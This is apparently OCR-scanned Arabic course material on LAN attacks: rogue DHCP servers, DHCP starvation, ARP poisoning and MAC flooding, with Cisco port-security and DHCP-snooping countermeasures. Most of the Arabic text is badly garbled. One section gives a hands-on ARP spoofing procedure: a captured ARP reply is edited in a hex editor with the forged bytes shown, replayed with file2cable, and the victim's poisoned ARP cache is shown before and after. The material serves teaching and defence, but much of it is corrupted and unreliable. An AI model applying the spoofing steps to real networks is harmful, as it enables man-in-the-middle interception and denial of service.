fjc. s j^ll 4jJ liA Rogue server .^Jl ^ aIL^L ^1^3! e DHCP ^ j& d jU^ jA ^Rogue DHCP server 
j Rogue server ^™ ^ L ^ 31 J c> ^ j« .DHCPDISCOVERY^^xJI U^VI 

Rogue cr^S cr^^ . c> ^3 ^-*J^^ J ( JJ^" >I1 J ^ ^UJI t C5 ijiiJ!/ C5 ixi3l DHCP 
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*5LutII ^L»^LJ! CjL» jIslxJI .Rogue server J^**^ * £>i& aac t C5 i*i3l DHCP ^^-^ lM* Vjl <LAa2uiVI server 

. DoS^ jmj ^ <^=^\ JL^sjVI a^jj^ J jj^a j Ji«j (j^Ai Rogue server ^ 



.Default gateway u^W^ IP u^j^ f ^DHCP Rogue DHCP ^Ui^l 

(j-<» ^ jill 11a ^jc l_Lu£3I (j^j V .^.^ 1 ^ cJ^^ cJ-^ ^c^ 1 4 l5^**^ ^-^-j 4_LjaljjaVl gateway 

jiL ^jij Rouge .DHCP Rouge * - DHCP <^I^1ujI iy* 'J^*-^ <u^^ u^ 1 * j <^ 

j^*^ j^V ^ -ciA** uj^ ^-^-^ rouge f 'DHCP Rouge i> < ^^13 

.4^1 jll cilti J\ J >J3 DHCP ^ j ^ 




"9 1" — ■ 

□ HCPOFFLH IIPV4I ^AUVtHT&E (II***] (Uiuc*s4| from Ro 



DHCPtt EQUfcS I I4PV4 | / REQUtST | IPv6) ISrejdcas t j 




Rogve Server 




OHCP Server 



running a rough DHCP server, an attacker 
send incorrect TCP/IP setting 



Wrong Default Gateway -> Attacker is the gateway 
Wrong DNS server -> Attacker Is the DINS server 
Wrong IP Address -> DoS with spoofed IP 



?Rogue Server cL^k j DHCP Starvation ±* £ti*M hL& 

DHCP Starvation *i £ti*M ^ 
DHCP J^jj 'u^j^' ^ MAC u^j^ i> c* 1 ^ Port security ^^^1 Jjjla ^ t*Ui ^1 

.Starvation 



Enable port security to defend against DHCP 
starvation attack 

• Configuring MAC limit on switch's edge ports drops the 
packets from further MACs once the limit is reached 





1 




U?er 




IOS Switch Commands 

switchpoct pori-s^cuiity 

_l switchport port-security raaxirnu.ii 1 

5=*e±-Cclipoct pgrt'S^cuiity violation restrii- 

j switchport pore- security aging time 2 

J switchpgrt p out:— -3 Lin: ity 5.gi_ri!5 type 

inact ivity 
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Rogue Servers ±* *k 

ia.Ha <^ ^ DHCP snooping .DHCP snooping s Rogue DHCP servers <> < ^3l t 
DHCP ^ Jj^» jj ^ ls'^ DHCP Snooping ^ jfc <DHCP Rogue ±± ^liall J^S t> .lMl^ 

DHCP discover <>> ^ ^ JL? jSjjjjJI ^ ^ j^Vl iali*ll V -ola <DHCP Snooping ^] ^ .^L^ll 
jjll (jS-aj V -uli t^j^jjoJU l^Jaj jj DHCP Rogue Cy* o^-W-^ ^ Cy* 

.DHCP discover 



Enable DHCP snooping that allows switch to 
accept DHCP transaction coming only from a 
trusted port 




i 

Untruated 



Untrubted 



Attacker 




IOS G lob j I CornrTidnds 



*M ip dhcp snooping vlan 4,104 -> this J5- what 
VLANS to snoop 

j no ip dhcp snooping inf orusAticn option 
this allows some DHCP options 

_j ip dhcp snooping this turns on DHCP scooping 
Note: All ports in the VLAN are not trusted by default 



ARP Poisoning 8.4 



.ARP Poisoning ^ .DHCP Attacks j MAC Attacks :sniffing t> Cm® ^ <u^' c*^ 

J] j^Aj IP ^ j ARP cache J MAC u' cJj^*jj ^ j*j 6 ARP Poisoning ? j^a ^ 

CjLaaA j tdijjljVI a£jjoi C5 ic j a£jjoJI <J jll ^ia j t4 ml uiaJ) diL* jlx-<Jl Aijjoj ^1 g O^J t4 j vffll £>jA ^Ia^j mU j!-&j> 

■ < * > rTu<s\ \ ^L^Jj DOS 

cjU^a 4 ARP spoofing < «Vv^ <(ARP) (Address Resolution Protocol) u' Jj^ Jj^jjjjj ^\ ^ 
.ARP Poisoning ±± Jf^j 'ARP Poisoning < <ARP Poisoning c_>Ijjj^Ij ARP Spoofing 



?(ARP) l)I jWI ^! JArjj* ^ 

t> Jj^jj^ j ojj^I Jj^j^jj* address resolution protocol ^ ^ jt ARP JjSjjjjj 

CjV j£ jj jjj ^-jV j£ jj jjj u] .(Network layer) ^f^l J jj>jj j ^ ^-jV jj jjj ^j^- j^ jj jjj 

<jla a A£l±Ai <L^ala L_buj| j^Jl (jj^J U»JJC (j^Jj(llOSts) ^iLwJIj dil^jJall lAj^xj] (IP) Ajllalftll ^jjjlixJl Jc J>usu ClljjjjVl 

1^jLu£ ^iloj Ajlgill J C5 5Jaiall jl jjjJI Ajjj^J! dijjjjVI J j^ jj jjjj djUUJl Token Ring j» Ethernet 

jl jixJI ^j^Luj (data link layer) jVI iSJa cjVj^jjjjj q\ Ujj . JL- jVI ^ (data link layer) 
J j£ jjjjj ^j5j Uijj*i ,<j jj*Ji C5^^^ ( ; ^ ^'^ ^j>^j j j^-j ^j^I (Jc- ^jjujI j^J! lAj^xj] (MAC Address) 
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jl j£-a-a jl ji*-ll J j^il ^jlgilt jll jl jJC j& ^ill ^jlgilt ^Uaill(JP) C5 lkl<Jl jl ji*-ll ^aisu CjULj 4-* *Ujj dujliVI 

(illil (IP) ( t 5^Jalall jl ji*-ll ^aisu ClljjljVI (J J^J^ 4-L^.j-all j£Jj .<_£j^.l <£jjuj ^^Sc ^aUaj jl A-lla a <£jjuiJ J nala L-LujL^ 

g-jtO^ll jl jixJI Jl <^ jll(IP) ^Vii^l jl jiJI Jj^jj jl a> V a£jJJI jic JSjJI ^IjUxj Ethernet -SI ^jL ji JjS Jaia ^U^dl 

.(Data link layer) jVI ^LL J ^ v^ . n^ t (MAC Address) iptkil ujjUJI j (Network layer) 

jl (MAC address) j^ 1 u'jA*^ (IP) c^^ 1 u>>^ cJjjp^ lUs JjSjjjjj j* (ARP) ojj^I Jj£jhjjj 

.(Data link layer) JaLujVI iSJa (Network Layer) A^^dl aLL j* Jjj^I 

L_flJjJaxJl CjVI j 6(jjjjJjjoJ! j-a .^^> ^l J^-l-^ L^l L>* MAC J^" LS^" <-5 J> ^^^1 <U jg > nj C*I&aJ 4 Jj£jJ jjJl li& aIa^LuAj 

<Lg J^J^ U' ^ ^'^ c ' <■ fl^a^Sl jl^Jl J^* j^ ARP ^^"'J .MAC U^J^- ^ JJ^a^J] ARP J l Ju ^5' LqA^LujJ 

J jSI MAC (jl cJ^-l j-* j mJjaj^J! 4.* j^JI J j^W u^-^-SI MAC ul ul ( ♦ 1 >j J] 
Jj^JI J MAC cjlj^ <4> .ARP JjSjjjjj J^ i> ^j^l JU^I t> MAC utj^ ^^>s ul ' <j > ^ l jU^I 
MAC jlj^ J^ J ARP ik^l <J^I ^*ll ^ ^ b Jjju321I (Xhi Jja j^ J^ (ARP Jj^JI) 
IP ul J^^j f% .(datagram)^U? ^ ^ (Transport Layer) J^l IP -SI J*^ -1 

m <4+ jll IP Jl jl jj^ Jia. J <^ jll 

^iuij JUt jl£ lil a^iA jll IP jl J (Network Identifier)^f^-SI ^ j** <^ IP -SI -2 

A-l^. Jill J J^ J diUi jlstJl AAaJLoUjal IP Jl jli JJ jlj Jl Jiill aJJ > 0 jl£ lij ^AjI^aII A£jjai3l Jc JJ jl J Jl ^al jll 6JjoiU^ 

.cjUUJI ^j^. J^i^ jl ls'^ j' Jl IP ul ^j^il <i^a^(Routing Table) 
ci^ll IP JL^j .^^Ull J^jJI jl jjc JL^ J Juj jaII IP Jl jl jj^ j MAC ul lSj^. ARP IP -3 

.Ic. jli JjJ t a^U MAC (jl J^' J ^H^l *^ J^^SI L-bol^ a\\ CjUUJI <xi jaJ JUI Jjjluaxll IP jl jic c5j^J 

aLis y^li ^13 broadcast ^ U^j ^ Data Link Layer -SI <±M ARP-SI <>UiJt -4 

.(Jjoj jJI ^UjIojU a£jj^I J (j^aau^ J£ Jl Ig-SLoj jl jll ^jaJt cJli ^(broadcast) ^1) 

jJI Jli J JjflluJI/<^. jll IP jl jjc ^ <j ^j^aLJI IP jl jjc jjl% ^ j*jj ^ARP ^j^- *Sj^Sj asu 44£jJo3I J J^ -5 

flkJl IP ^UaJ V jl jJsJ! liA jl£ lil .^i^JI IP jl j^ Jia. CjU jl^ I jlij ARP -SI (-Jia Jy^un ^ Jl LAN J^ ^^aJI -6 

. JjujjJI jUa.1 jj^ ^alaJlj L_JUl 11a JaL^L ^jIj ^aUaJl jli 

J^jJI IP jl ^jouj ^UiJI ^jL .ARP Request J^ ^ ^UiJI IP ^Uaj ^>J3 lJ^JI IP jl jj^ jl£ lil -7 
MAC jl ^ ^ (ARP Reply) ARP-SI *4*S J ^ jllMAC j IP J^ Jj ARP ^ j^ lU>JI MAC j 

.lU j^SI MAC J^ J ^ u-*tiJI 

>L J^i3 Jbj^l jl jisJl Jaa. ^l^klojU L-jlkSl Jj ^Jl CJjojUJI Jl ARP J^ ^UaJl ^ JL -8 

jaJ l^JSl - gab Jjuj^J] JL jjall jl jisJl Jla. J *^ ji. jJl A a laJLujJj ARP -SI ( ; lilall J jJJ ^IS ^ Jl J laJI J^iluJJ ~9 

. JL^iVI ^ J3Jj <jjlkJI <^jJ I^ISjj ^ data link layer J ^UUjII 

uLuxJI f Lmui ^A-Ja aII 4 mi It Jp < jj jjj ^ J^^- cS^I J JIj-aJI J Jallld t Jj<n^lL ARP Jj^ JJ^ ^ 

I Jj LaS MAC L^J^J 'IP L^J^J 

HostName IP MAC 

A 194.54.67.10 00:1b :48:64:42:e4 

B 192.168.168.3 00-14-20-01-23-47 

Sj^li J B t auu^u MAC d)l Jj? » ^ ^ ^ u^ ^ jl u^ ^ *^jl ^ B t %i^JI jli ^ ^^^11 ^ J^i jj| JjS 

Jl jlj^ J cj^j lil iAK ARP (ARP Cache) ^>ll aJ>2ll SjSI j 6- cS^ 11 ^ . (ARP cache) ARP^>1I 

jjjUc ^1 J jj^a jll ^^ic Sj^SlI A t auU^l j\i ttilli t^^Lk ,B L_flJjJaxJl £a SjjujU-o Jj^al jlill 1 g i£ tAii^joaJ ^1 Si MAC 

:c5 jU3l j^]| ^ Jl ^juiSI C5 ic jjiijjJaxJI J£ JLoij A < ^ hoSI . ARPJ j^jjj J^ c> B 4 <j>^^ MAC 
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ja ^ MAC ub^j 194.54.67.10 u»j^» ^ ^(192.168.168.3) IP u»j^» s^^- j* c> 
<JLojj3I d^a ^ jiaJ c_ASa -uja. JL-jU A L-LjjaJ! ^ jSj Ua tciL ^UJI MAC a' Cj\ -5 00:lb:48:64:42:e4 
,A ^i^aJI ^> (ARP Broadcast Request Packet) B < <j > ^ 1 j( ^j^? .B < <j > ^ 1 

aJLoj j JLoj jU b < ^jij t> ,4j ^UJI ARP cache ^ ^ J^ll MAC u' A ( IP il jj& ii^j I jja 
U! liA Jjii (ARP uncast Reply Packet) A * 1*1^ J ^1 ^ >JI ^ o jU^ uj^ ^ j 

.00:14:20:01:23:47 j* ^ u-UJI MAC u^j ^92.168.168.3 

ARP MAC (j' J B L fl^a^I] IP <jl jjc (JJJ AS^jlII J^jJ L_fl jjoi li^i 6 A t fl^a/ill lM* B t *°J 1 U <^ (j -0 ^iuit ^J^-aJ 

m (jiaxA\ ^ > ^>t j J-*^ ^UiJ 4 ^^jjjjVI <ijjja-<Jl s^_a.Vl £>i& ^jjj <JL^jV1 (JjjjjujIj i^l j a > <al ^ \l cache 



I wanl to connect to 
192 Hia.I&a. J, but I need 
MAC address 
Think r II broadcast 



.1 U- 



IP 10 15J.54 67 10 
MiM:0Q:lb:4S;64 42:M 



AHP_BtQUE5T 
H **lo, I find (he MAC address of 192. 16S. i&S I 



ftRP REQUEST 
H*lb, J n«d di. MAC iddr«i Ul.lfifl.lfiB.} 



AHP_ Rr PL V I Am 192 .16B. l&B. 3. MAC addmi n CO- M^SHH^-tt 



*3 

ip id: L9z.ifia.iea.i 


ID t:*W"dCW5 n j ^£m;i £M 


!■ L'. -.11 ill ,1 . iMlh U:t : 'Jill-,! lull F.?.F1ftftI 

;=> HRj: HlunnmlFb CunHii-*Liu-i. * 1 rL*hLi 

Intuetidtf lfl r l».L».l?B — g u 

: »" 1 ■ "i 1 i .. . . : nil4ru=iij 

J ' : .tt-t.v j« H ^ ■ m 

I H.I^H.IRfl. IT *- * 

i M-H.i'-n .ir.u.t-r ^» 1 
L^.lf-H _ 1 r.fi _ rill ihf i ?! 

i ¥H.if.u . ir.s.a^ m 

IU.I.-h,lhk..lU tit 1 1 
I "t'A . J ■ i- . L h K . !i I __ _.. 


IP ID. 19M6a.t«.l 




MAC: 








IP 10- 19MGS.1«6.» 









MAC: OQ-14 Z0-01-Z3 ^17 



Connection Established 

^l.^i>nb cilUJI ^j! jjc t . ilia] ^^kjjoaj j t . lUali iARP request 

^jt ji*il (j-<i" t « ^ cJ^j^ ^jW^ f ' " q 192.168.1.5 L-i^.L^ j^-?> ^ cJ^^^ ^jW^ lP 3 ^)^ !cJ^ 

"192.168.1.5 

<j ^UJI ^j^l Sual\ J^jj j m jliaxJi ^ c^VI iiH^j ^ill jl^JI < jj>">'Q ^n^j <jU^jojVI >«l I^a :ARP response/Reply 

^ o-aUJl ^j^l cilUJlj ^ ^V! liA l^L^ Ul" ^jl^ <JU3! ajUI^V! JL-jU 192.168.1.5 JU^ 1 ^ 

"00:11:22:33:44:55 

aL p jjl cSSUll Jilk jx» ^ ^Vl ^ Jjj^JI ^ij dii^ jSl j JjVI j^l (joiij :RARP request 

mL> * j\ V^j y-j c^VI jl ^ tij^j ^ jSl j ^1511 <jUi^VI ^1 :RARP response/Reply 

*^ ^<J1 S^-^-Vl <JLujj lIj^j^ t° l!^^ 2!^^ ^ , ^ SLa 'ARP J cJ-^ ^ LLa^a ^jVl l!^?' 

^1 <J (j^aL^J! (JJJJ^l tilUJl (JLojjI J!>lk. (j-a <jL^JjujVU ^ajL jl^JI li^ iAjuz Jj^I jjll ^JJJ C^^l jig ^ H (JJJJ^^ (JC- ujJ 4£jjaJl 

tUjjobd IgJtxi Jj^al jjll ^aJ ^^jll ftj^VI ^^ic ^ jl^J ARP J i^C- iSj^i *^ j^"^^ C-!-^ ^J jaJ ^ .' e ^^ a (5^^ jW^^ 

cilLiA ^j^l j t(<J jAa. ^ jl^a. <L^1a3I ^LajIL hVi^j <jV) j Ki tti j ^^jIj ARP lSj^j^ j^>^ ^^^j ^ u*^^ 

! ! j^VI ^jta ^ lUjj <jI jJj CjSj ^1 ^ ARP response 
djUi (Jiiwj jl^aJI i^A j a£jJo3I ^ ± ja. ^ IgJLojjl j ARP response ^ u^j^ UjI£^\j <jl ^ 



ARP Spoofing Technique 

t«lli t> cJ^SI ;U .4_iL^3l JL^ijVI ^ ("Spoofed") j ARP j ^W^' ^ ARP spoofing 

IP u\j^\ ^ j^- cfi ^ '(default gateway J^) j^l ( <j > ^^ IP u*j^ ^ ^W^^ MAC u'j^ -^j 
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jj^ll ^j^- flS j jl 6 jj^JI <£j^ lS^-^ j a\\ a£jJo31 Jc CjULiJI cjIjILI ^paljjcl ^ ^jj^I^aII ^ajuij ARP spoofing 
< session hijacking<man in the middle 'denial of service <c£ ^ j^aJI li* ^ v^ ». n U Lllc. j .UUi 

MAC Flooding J 

.A-lla all A£jjoJ! ^laj Jc j - aJ3J j 4 (ARP) cJ.^*^ (J J^J^ L>* ' J^ CjI^JjoJI Jc Ja^a 4_x»l,Jjkjjuil (j£-aJ ^ ^ 

l$\ ."ARP Reply" J "ARP request" ? J^ ^ 4-^UJI ARP cache j -^h * j£j < Lu^l l jj j^SII 

(j^a (jj-a^ig-xJl (j£-*J Clii^ _4i^U^<Jl 4jUr. t . lilajj V ARP <J J^J^ U*^ ^^PH ARP L * C +Jy O^** 4_i1^a1I 4£jjuJI Jc 

jln^ll A£jjoJI jl L-flJjJaxJl (jlajsu ^jl <j£-aJj a jj-a ajLiScU (j-al£ll <Jlkll lifc aIa^LujI 

|: : : :| 

; arpcmImmMa AJtPe»tto»t»M» arp <-»tfft*rab»t ARPctdwuite 



10.0 0 4 7»«<r44-J4-*<2-2S 



10.0.0.8 h3-79-kJ-46-V*-64 




PC01 



Rd^ttr/Gataway 
10.0.0.4; C«4 «~4S4)4-92 




pen 

10.0.0 6; 78-eG-44-34-h2-2S 



10 0.0.4 cfc-24-sfr4S-«4-92 



PC0- 

10.0.0.f; W 7S-k*-4fr-V»-64 



aouf#f/<i*taway 
10.0.0.4; i 



A 














5 











PC07 

10.0.0.6; / !:-M./i.!4i;, 



Spoofing r o st computer 



Spoofing router/gateway 



ARP cadi* tab* 

10.0.0 4 J4 ^ » ? 2$ 



pen 

10.0.0. • hJ /9*i 'bvUti 



10.0.0 8 78««di Wh2 25 




PC02 

10.0.0.6; 71 «*»*4 *4 W Zi 

Spoofing host and router/gateway 



<ARP ^ lUjj JU^ 1 lA* J-uV ^ j ^1 jll (Sja^VI) MAC u 1 (Ji IP ou 1 ^ ^ ARP 

t^Jjl jll J .( ■ U^OjujJ L_fl jjoj ^£^11 jIa^JI A a Lfl (j-G ■ja^'iU 4_ljjaij (_£l ARP J^J^ *^ 'C**^ 1 ^ ^ ^ L>^ C5^^ ARP ^>f^s 

t> *^ j! jJl ARP Reply Jijp V ARP Request fJ ^1 Sja^VI J ^ ^ARP ^ ^1 J,^! <y* ApJ! 

JjJj 4jS> s ^ yr* J J J^ 1 J 1 (43 ' ^ Jl^V! ^1 J JU jl ^ ARP Table -SI J 

^Jc. j-<JI ARP Replay cJ^j^ ^JaLunj j^a 4^ jjl^ a\\ I^jj (J-g j jj jjj^II 13^^^ ^jUr> 

(jl jjc £d IP j (jjiaiijj I j^ilxj (jl AjauJaJI jIaj> jj-^.I^a1I jj^j j 6 ARP Tabled ARP ^U^c >^l 
^^L^L ^^31 ^ Jl broadcast ARP REPLY ^ u^W^ c?^ 1 MAC 

til iSijilb (j^aUJl Gateway -SI uj^ ^ c^^j IP ARP -SI Jj^- Jj^«j1I uj^ ^ 

<J ^ajlj <J£ (Jjl^xJl Aj^U (j>»j jJjjll (Jjlk^ll jlAJ> <jUllaj 4jUUj (JLojjU (JjI^aII jl^aJI I^JJ -j^Ui^U (j^J 

(Jjj^j* (j-a (j^j JUlUj 6 jIaj> l!^-^- Cy* ^ T J^> L - J ^W^I ^*^4 jjll Jj l^I ^j'qj'^SI \ -\ j Jl CjUUill 4^ jj o^lcl 

(jl (^^judjj (jl (jjl^ a\\ IxjJa j jj jjll Jl (jjlk-<Jl jl^Jl (j-d Jjl*ll tiljaljjl! 6^lj3 j S^aLuIa (j-a (j^JJ L-fl jjoj j 1VIIT1VI Jj 6 j^-A-^ 
m 4-i (j^aljkll jlfr^Jl IP j& (Jjj^aII jl $-\\\ JL jji3l (jl jjxll (jU £>UI UJjlxj jj jjll Jj j^.1 jj L_llla ci^JJ 
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J£ J L-ic. jj ^l^xJI t JUl<JI Jc- .^j*^ J o^-^ o£ f j^' JalSslV ARP Poisoning ^Vi^t ^c^^ ^ 
ARP Reply JL-jl ^> t> ^ .192.168.1.25 <Jj\J\ jWj 492.168.1.21 Jj^ jjj-JI 

Jta^ .192.168.1.21 ^ J j^ 31 JU^ MAC u> JU^ J) (<i^ m 1 ^ ^ l& ^) ^> 

jjc. 4_laJjj tA-ia - tall jj jJJ<^ <*-flJ ARP Reply cJ-^J^ .A-ia - *all jj jj;^^ f ^ £ jj;^^ ^JJJ lal^J JJjl jJl 

l!&u!£ ^L^Jl 'I jpJ .j^jl jll j^j^^' ^ j^ > ^ 1 jU^ .192.168.1.25 ^ ^ <j-aUJI MAC 

Jj 4_pujJI jj jj^l! (> UUto Jll jjj* a£ ^1 JL-jV (IP FORWARD) IP sic] ^^^j* JjiJdl ^Ikj SJj* 

<i]U& (j-aj tA^I g all ^UaJ Jj <£jjai3l JJJ* (*J^ ^aUaill q\A tCjjjjjVI Jc- ^ j^. 4_i^jJa3l (jj^J L»,jjc. t^jVI . J^J^t 

q\A i Jji^Jl JJ jl jll j^-^- Jj JJ^>^ ^^P" *^lcj Jc ^.I^aII h^l (jl ^j^AJ , Jji^Jl JJ jl jll jt$J> J] ^ (SJ> JJ 6^lcl ^aJJ 

. JJJ^l CjI a\^\ ^jJal jll (J^aJjM Jc- 1— jjLdOJJ j A£jjoJ! JJJ-a 4-^J^> (j-ajJC-t ^ fO^ (S ^ L)\ *^ A-l^jJa3l 

t> u^j^ $ j^j ^ .a£j^3I (Jiijj^ lJ^j j3Ij ARP cache poisoning MAC flooding 

cjI jj^ (jjjfla^ ^ J^iJixi ^jijjjjjaJI ^jj^aj <hub J ."hub" ^^j 3 ^ Jj j^*^ u^j^^ u!^ J W^' 

.4£jjaJ! J JJ JJJ-^ (J^ Jj A^f^l JJJ^ ^^>^ **— ^ 6 J^^J 

a£j^. Jc. cib^jjll ^ j£ dj Ua ^j-<i j CjLujjjjjaJI ^j-<i •^• j * 3 ^(overload) (j^ j^-J ^ ^ <qj ^j>1^-<JI ^jli ^Jmb JiLd ^jjjjoJI cJ-^s ^ ij ^ c ' 

.^ KTi^ t ARP Reply u^j^^ o- 3 ^^ ARP Jj^ j^j c> 

^ARP Spoofing J^u uLS 

http : //trapezenetworks . com/us/en : j^-a^ll 
^ j '(broadcast domain) 2 ^^3i J ^ ^ v^m* ^ ^Luk ^ jj^ ^^i^ I^jj ARP Spoofing ^ 
u j^^^ t . MACu'j^ cU^i i^Ji^l IP u'j^ ^^^^^ ARP Request y± (broadcast) ^ 

JJ 'ARP Request ^ J^ uj^ c> J 3 ^ (broadcast domain) 2 ^^3t J^ di^iil! 

,L_flj j-<i ]MAC ^" Ui ^ . J^j-^^ 

Jj jjj^JI c> MAC u'j^ c^j^ c> ^ ARP Spoofing .^jk\ LAN ^V-j j* ARP Spoofing 

jj> ARP Request ^ ARP cache cf ^ ^ u^j j^j^f^ MAC u'j^ 

CjjjUaVI lS^-^ g ^ ^j£-aj ciiia jj* jjj^II Jj cjljUaj J^j^ L_fl^JI jj jjj^II <jl£ 4 jj ARP Reply ^^>^ AJ 

JaJj ^J jla ^jC DoS r* L>*^ ^ti ttilli Jj AiLjaVlj .iajuJ jll J C-l^-J ^ J ^>^^ J^ ^ ^ 1 >1 jj (J^ 

C5 3 ! ^e^j^ c>j passive jjj^^ ru ^ v l: ^ J Gateway ^ o-^UJI IP JJ MAC u' 

.Ai^luuJI <^j> jll Jj ^UVl 




When a iit^r A In LidLbdb d Leiiiun gwiiii ut«r E in ihe 4ame 
Layer 2 b-oadcast domain, an ARP requesl Is braadcas.t. 
u-ii ng user B's IP addra^ises and wi-ser A waits for uwr B to 

respond with a MAC address 





^cnds akm request 



J 

Switch broadcasts ARP 


L J 

Actual iGErtlmateusBT 


L 




^ ■* ^ +- * ^ 


Switch 





[ 



Malicious user eavesdrops on this unprotected 
Layer 2 broadcast domain and can respond ed 
broadcast ARP reque^l and reply to uier A by 
apooftng us«i B-'s- MAC address 




Ma lie lout- user eavesd^opi on 
trie ARP request and 
responses and spoofs a& the 
leRitirnate u»r 



inforrnanonfor IP addr&ss 
IQ.l.l.l is now b*ing sent to 
MAC address 9:8.7:6.5:4 



AtldcLker 
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jW lJ\ ARP Reply jj ^W*^ 6 JlS^Vl <> ^L? ji ARP Reply c> (i^ll ^ ^ ^ j 
c> jjj^' ^l&J (jSai <ARP cache .W-l ARP cache ^ <3 j^ > ^ l 



ARP POISONING 6- ^1^1 
ARP Poisoning 



Using fake ARP messages, an attacker can divert aft com m un icatia ns 
between two machines so that alf traffic is exchanged via his/her PC 




ARP Spoofing With Hard Way 

^UjU tillij Jjt ::;\\\ ^tk> J^U AlajUL ARP Spoofing jy\ ^Jsi 

ARP Request -^t&ll c> ^ f .o^j^ ls^- Gateway ^ j 3 j^ > ^ 1 jjj jj><J1 lallilU ^ j£j 

(JLujjI S^lcL jll L_fl jjuj tiljli 4DJJ^)^J ^^)^AJ ^Ljl^l L-buJ ill HEX J^)^ 0 f ^ .WiFCSliaFk ^"^^ 4_Iajull 

.c_jU3I 11a U^V wireshark ^ ^ j£j .file2cable fl^iul? a£jj^3I <u j^JI 

■HEX jj^ 'cK^ cP! 'ARP Reply 4^ 





Rla Edit VI qw IjO capture Analyze i^t-ati sti ce Help 


m m (M m « & ra * ^ & a ^ ^ » ^ ^ i 


- 1 d 


3^ ^ eh 


^farter: || 4- bxp^ession 


. . | ^> C- 


ar | -if Apply | 




| j uu rce | Destination | R-otocol | Into 
[66 hoxconn Zj:&S:/1 IsFoaticlait AKP wFcTR^s 19^.108 


. ^ . 1 •" fell 


1SJZ.I5S.2,H)2 


_l 


_U 1 _±J 




Ether net IL Srr_: Thcrn^oriT 23:d4:e6 * O0:9O:d0 :2 3:d4:e6K. Dil: Foxturin 


27:65:7f (00:15:53:27^9: 


-1 


■- AtJJr-chE^E, Ruli-u lulmri Prototol {rtiplyj 








Manflware type : Lth ern-et ( DxOiJ a 1 > 
Protocol type: IP (OxOOOOl 
Hardware si:ze ■ 6 
Frulocicsl sii^r.^: 4 
(Jpcocs: reply (C'J-KfHJO'dJ) 

Sander MAC addrsss; "Trt-ci m &c-ri — .3: E> : d -1 ■!' GO :t? O : dU :23:dd : aO ] 
Sender IP address: 192.1C8.2.1 (192.1G3.2.1) 
"ijrcfel MAC address: Feaxc:cnn_2.7 :S9 :7f (OO : 1 5 : 5 S : 2~7 7f) 
arg^L IP addrc-jEi: 102.16£ 2 102 C 1 02 . 1 SS .2 102 h 


1 


- 1 




1 _lJ 




OCOO 'iTi'm Ijm^iMrjgHjIrJ^iTp^i ■'. 1 iM. rl iT;giT^TiTi¥^ i mmw 

ocio g fm n M 


| Trams (Tame), -t- 1 bytes ;| F: 21 D: 21 M: O Drops 


: O 
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;Jtt\ laaiU HEX JJ~Jt 6- ^JJJ JJ>^t l£U 6* 

ARP packet Destination: 00:15:58:27:69:7f 
ARP packet Source: 00:90:d0:23:d4:e6 
Sender MAC address 00:90:d0:23:d4:e6 
Sender IP address 192.168.2.1 (cO a8 02 01) 













w jar^i^j 














1 


























GOGGOCOO 




15 58 


27 


69 7F 


GO 90 


DO 23 D4 


E6 


03 G6 OO 


Ol .X'i . . 


.# 






OOGO0G10 


OS 


OG 06 


04 


00 02 


00 90 


DG 23 D4 


E6 


C3 AS 02 


01 


.# 






03GGOC20 


00 


15 58 


27 


69 7F 


CO A3 


02 66 GO 


OG 


03 GO OO 


03 ,X a i . . 


.f 






00000030 


M 


OG 00 


00 


00 00 


00 00 


00 00 00 


00 


02 FS BB 


83 

































A G Help 




exit 


(fJo 


Gave) 


A T goTo 


Offset 




Exit and 


Save 


Sea rch 







Figure 29 - Editing the ARP Reply in a Hex Editor 
.^31 1> ARP Spoofing ^ HEX iSi* <> ? 'ARP Reply ulS oVl - 
Gateway: 192.168.2.1 00:90:D0:23:D4:E6 
Attacker: 192.168.2.102 00:15:58:27:69:7F 
Victim: 192.168.2.111 00:14:85:24:26:15 

Victim Packet -1 

(jl _ji*J (JjILJI ja -^-^ all MAC u' jj^ -^jc^U i ^-l^k J jLsj i_i (Victim Packet) ' ^1 ^ j- 0 ^ <<« jaJI 
ARP Reply > o 3 ^^ 4^ «^ ^ .(192.168.2.1) ^Ij^Vi Gateway JW u-Lkll IP 

: ? ja4Jt JjS Aja^all j^. ^fe ARP Cache 



C:\WINDOWS\system32\cmdeKC 



C:\>arp —a 

Interface: 192 .168 .2 . Ill 0x10005 

Internet Address Physical Address Type 

192 .168 .2.1 00-90-d0-23-d4-e6 dynamic 

192 .168,2.102 001 5-58-27-69 -7f dynamic 



i 



HI I _Ll. 





n »- 7 

-v - 












Shell 


- Konsole <:2=> 












5 




1 1 


^ 




QDOGGGOQ 


GO 




85 


2A 


2B 15 


00 15 


58 27 69 


7F 


03 


G6 


00 


01 . . $+ 


. . .X'i . . . 


. i 






GOGO0O1O 


G8 


GG 


06 


04 


00 G2 


00 15 


50 27 60 


7F 


C3 


AS 


02 


01 


. . .X'i . . . 


. , 






GGG0GC20 


GO 


14 


85 


24 


2B 15 


CO A3 


02 6F @G 


OG 


G3 


GO 


00 


G3 . . $i 


. . . . o . . . . 


. i 






OOO00G3G 


00 


GG 


00 


00 


00 GO 


00 GG 


00 GO 00 


OG 


02 


FS 


BB 


S3 .... 










































"Q Help 




Exi 


.t 


(No 


Save) 


A T goTo Offset 






.t 


and 


Save 


A W Search 







\<JN\£ ARP Cache CjVU^I ajJ <±*ujal) jl^ ^li <file2cable ^v^l? a^u^W J] jaJI ^ JL^j) 
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H C: \ WIND OWS\s y st em 32 \ c md.eKe 



Interface: 192 _168 _2 _±±± 0x10005 

Internet Address Physical Address 

192 .168.2 .1 00-90-d0-23-d4-e6 
192 .168.2 -102 O0-1 5-5 8-2 7-6 9-7f 

C:\>arp —a 

Interface: 192-168-2-111 0x10005 

Internet Address Physical Address 

192 . 168 .2.1 00-15-58-2 V-69-VF 

192 .168 .2 -102 00-15-58-27-69-VF 

C: V>_ 



Type 
dy n a.m ic 
dy n a.m ic 



Type 
dy n am ic 
dy n am ic 



LH 



J 



MAC u' uVl gateway y> p% c?' '^j^VI ^> liL^j J&i ARP cache J^) 

Gateway Packet -2 

4_i^jja3! ^Uail ^aj^LxJI j-^ Gateway ^J-^ ^l^s .Gateway ^3^- e^^j J] 

ic^Vl* HEX jj^ fl^l^L JjAxll! J^k <> tiUij t^l^Jlj o-^UJI MAC u 1 



1 



OO03GGOO OG 90 DO 23 D4 =5 GO 13 

O003GG18 08 90 Sfi 64 00 02 00 15 

R0 90 DO 7^3 D4 =fi CO A3 

0003QG3 0 00 00 QO 00 0 0 03 00 03 



58 69 7F 

SB 27 69 7F 

fi7 G~ gj0 

00 GO 00 GO 



3l"To Off ^if- - 



08 Cm 3<3 Gl 

CO AS 32 6 F 

0fi OO GO 

02 TO 3D 00 



.# . . .X "i . 

_ _ > "i . 





:Gateway ^ u^j <4j 



